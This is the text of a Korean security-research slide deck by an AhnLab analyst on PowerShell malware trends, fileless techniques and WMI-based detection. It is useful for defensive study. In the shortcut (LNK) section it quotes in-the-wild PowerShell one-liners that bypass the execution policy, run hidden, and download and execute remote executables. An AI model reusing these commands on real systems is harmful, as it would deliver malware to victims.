Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판

PowerMalware ?!
2016.11.18 – 공개판
안랩 시큐리티대응센터(ASEC) 분석팀
차민석 (車珉錫, CHA Minseok, Jacky Cha, mstoned7) 책임 연구원
PowerShell 를 이용한 악성코드와 기법

© AhnLab, Inc. All rights reserved. 2
:~$whoami
Profile
− 차민석 (車珉錫, CHA Minseok, Jacky Cha, mstoned7)
− 1988년 1월 7일 : Apple ][+ 복제품으로 컴퓨터 시작
− 1989년 : Brain virus 변형 감염
− 1997년 : AhnLab 입사
− AhnLab 책임 연구원 (Senior Malware Researcher)
− 시큐리티 대응센터(ASEC) 분석팀에서
악성코드 분석 및 연구 중
- 민간합동 조사단, 사이버보안 전문단
- vforum, AVED, AMTSO 멤버
- Wildlist Reporter

:~$whoami
• 책
-보안에미쳐라(2016)
* Source:http://www.yes24.com/24/goods/29333992

시작하기 전에
• 보안이 완벽한 시스템은 이 세상에 없어
- MatthewBroderick주연위험한게임(WarGames)
* Source:WarGames(1983)

Wrap up
• PowerShell를 이용한 악성코드 증가
- Windows7와Windows10점유율에따름
-보통RansomwareDownloader로이용
-TargetedAttack에도이용시작포착
• WMI 이용
-Fileless악성코드제작가능
• 전망
-JS,VBS와함께PowerShell악성코드증가예상
-Multi-Platform악성코드가능성

Contents
01
02
03
04
05
06
07
PowerShell
PowerShell를 이용한 악성코드
Technique
파일 종류
Fileless Technique
Case Study
맺음말

PowerShell
• PowerShell
- 2006년공개된ScriptLanguage
-WindowsVista이후기본탑재
* Source:https://msdn.microsoft.com/en-us/powershell

Windows Management Instrumentation (WMI)
• WMI
-
* Source:https://msdn.microsoft.com/en-us/library/aa394582(v=vs.85).aspx

Windows Management Instrumentation (WMI)
• WMIArchitecture
-
* Source:http://oversitesentry.com/blackhat-presentation-wmi-architecture-used-to-attack/

PowerShell + WMI
• AntiVirus제품 정보 얻기
- get-wmiobject -Namespace rootSecurityCenter2 -Class AntiVirusProduct

PowerShell + WMI
• 가상환경 검사
- Get-WmiObject –Class Win32_ComputerSystem

02
PowerShell을 이용한 악성코드

© AhnLab, Inc. All rights reserved.
Timeline
Monad
발표
1993 1998 2000 2004 2006 2007 2013 2014 2015
Poweliks
2016
PowerShell
공개
PowerShell
+ Macro
등장
VB
Script
악성코드
PowerShell
Downloader
범람
PowerShell
악성코드
POC
Macro
virus
2017
Loveletter PowerShell
Ransomware
Kovter
향상된
Batch
virus
BedepPhase
WMI
이용한
Fileless
침해사고

1995 – Macro virus
• 1995년 – 2001년: Macro virus전성기
-
* Source:

2000 - Loveletter
• 2000년 5월 4일 LoveLettervirus
- email로전파
-Iloveyou라는메일제목의사회공학기법사용
-그림,음악파일파괴

2004 – Monad
• 우려
- 2004년Monad개발
* Source:https://www.virusbulletin.com/conference/vb2004/abstracts/return-script-viruses

2006 - PowerShell 악성코드 POC
• PowerShellPOC 악성코드
-
* Source:https://www.symantec.com/security_response/writeup.jsp?docid=2006-080216-3625-99&tabid=2

2006 - PowerShell Released
• PowerShellReleased
-
* Source:http://www.symantec.com/connect/ru/blogs/powershell-released?page=1

2013 – PowerShell Ransomware
• PowerShellRansomware등장
-
* Source:https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/

2014 - Poweliks
• Poweliks
-Registry내저장
* Source:http://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/

2014 - Phase
• Phase
-2013년발견된Solarbot변형
* Source:http://blog.trendmicro.com/trendlabs-security-intelligence/without-a-trace-fileless-malware-spotted-in-the-wild/

2015 – WMI 악용
• Black Hat2015
-
* Source:https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-
Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf

2015 - PowerShell 악성코드 증가 시작
• PowerShell악성코드 증가
-
* Source:https://securelist.com/blog/research/72417/the-rise-of-net-and-powershell-malware/

2016 - Macro + PowerShell
• Macro + PowerShell
-
* Source:http://researchcenter.paloaltonetworks.com/2016/03/powersniff-malware-used-in-macro-based-attacks/

2016 - PowerShell 이용한 악성코드 유행
• PowerShell이용한 악성코드 유행
-
* Source:https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/

In-the-Wild 악성코드 조건
조건
많은
사용자
보안
체계 허점
손쉬운
제작

PowerShell 악성코드 장점
장점
강력한
기능
손쉬운
제작
행위 기반 제품
우회 가능성

주요 감염 경로
• 주요 감염 경로
Mail
− 첨부 파일 혹은 Link
icon
Web Browser
− Exploit Kit 이용
− Fileless 악성코드 감염에도 이용

감염 경로
• Mail
-

PowerShell 실행
• 실행 권한
- DownloadFile명령의개별명령과스크립트실행테스트
-개별명령은실행되지만스크립트는정책상실행되지않음

PowerShell 실행
• Bypass PowerShell executionpolicies
-
* Source:https://technet.microsoft.com/en-us/library/ee176847.aspx

PowerShell 실행
• Bypass PowerShell executionpolicies
-
* Source:http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html

기능
• Downloader혹은 Dropper
-
* Source:https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/

종류
종류
Office
(DOC, DOCM,
XLS, XLSM)
Shortcut
(LNK)
PowerShell
(PS1)
Windows
ScriptFile
(WSF), HTML
Application
(HTA)
Java Script
/Visual Basic
Script
(JS, JSE,
VBS, VBE,
WSF, HTA)

Java Script - JS
• JavaScript(JS)
-

Visual Basic Script
• VisualBasicScript(VBS)
-

Windows Script File (WSF)
• WSF(WindowsScriptFile)
- 대부분JavaScript

Windows Script File (WSF)
• WSF(WindowsScriptFile)
-

HTMLApplication (HTA)
• HTMLApplication(HTA)
-대부분JavaScript

Office (DOC, DOCM, XLS, XLSM)
• Macro 포함 문서
-

Shortcut (LNK)
• LNK
-

Shortcut (LNK)
• Download
- %WINDIR%System32WindowsPowerShellv1.0powershell.exe $cmd = 'Start-Process';$b = '%TEMP%tes'+'t3.e'+'xe'; $a = New-Object
System.Net.WebClient; $a.DownloadFile('http://*****ennox.com/wp-includes/putty.exe','%TEMP%tes'+'t3.e'+'xe'); &($cmd) -FilePath
$b;

Shortcut (LNK)
• Download
- C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object
System.Net.WebClient).DownloadFile('http://dire****.com/2D2A/bg.exe','%APPDATA%Example.exe'); cmd /c '%APPDATA%Example.exe'

Shortcut (LNK)
• Encoding
- C:WindowsSysWOW64WindowsPowerShellv1.0powershell.exe powershell.exe -EncodedCommand UABvAHc………

PowerShell (PS1)
• PowerShell
-

Fileless
• FilelessTechnique으로이용
-Poweliks
* Source:https://blog.gdatasoftware.com/2014/07/23947-poweliks-the-persistent-malware-without-a-file

Fileless
• FilelessTechnique으로이용
-Poweliks

Fileless 악성코드
• Kovter
- Run항목읽을수없음

• Kovter
-mshta.exe를통해Script실행

• Kovter
-인코딩된데이터

Error
• WindowsPowerShell작동 중지
- 갑자기WindowsPowerShell에러가발생할수있음

Response
• WMI for Detectionand Response
-
* Source:https://ics-cert.us-cert.gov/sites/default/files/documents/WMI_for_Detection_and_Response_S508C.pdf

전망
• PowerShell의확장
-
* Source:https://blogs.msdn.microsoft.com/powershell/2016/08/18/powershell-on-linux-and-open-source-2

전망
전망
JS, VBS
대체 ?!
Obfuscation Cross-Platform

Wrap up
• PowerShell를 이용한 악성코드 증가
- Windows7와Windows10점유율에따름
-보통RansomwareDownloader로이용
-TargetedAttack에도이용시작포착
• WMI 이용
-Fileless악성코드제작가능
• 전망
-JS,VBS와함께PowerShell악성코드증가예상
-Multi-Platform악성코드가능성

현재의 보안 문제
• Not reallya fair fight
* source:http://image-store.slidesharecdn.com/81268b95-5c3b-4604-9129-d83ab3dc4600-large.png

현재의 보안 문제
• 모두가 함께 해야 하는 보안
* source:http://www.security-marathon.be/?p=1786

Q&A
email : minseok.cha@ahnlab.com / mstoned7@gmail.com
http://xcoolcat7.tistory.com
https://twitter.com/xcoolcat7, https://twitter.com/mstoned7

Reference
• Ryan Kazanciyan& Matt Hastings,‘InvestigatingPowerShellAttack’,2014
• Matt Graeber, ‘Abusing WindowsManagementInstrumentation(WMI) to Builda Persistent,
Asyncronous,andFilelessBackdoor’,2015
• Santiago M.Pontiroli &F. Roberto Martinez, ‘TheTao of .NETand PowerShellMalwareAnalysis’,2015
• 김승훈/AhnLab,‘매크로 다운로더 분석’, 2016

Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판

Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Similar to Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판

Similar to Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판 (20)

More from Minseok(Jacky) Cha

More from Minseok(Jacky) Cha (16)

Recently uploaded

Recently uploaded (20)

Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판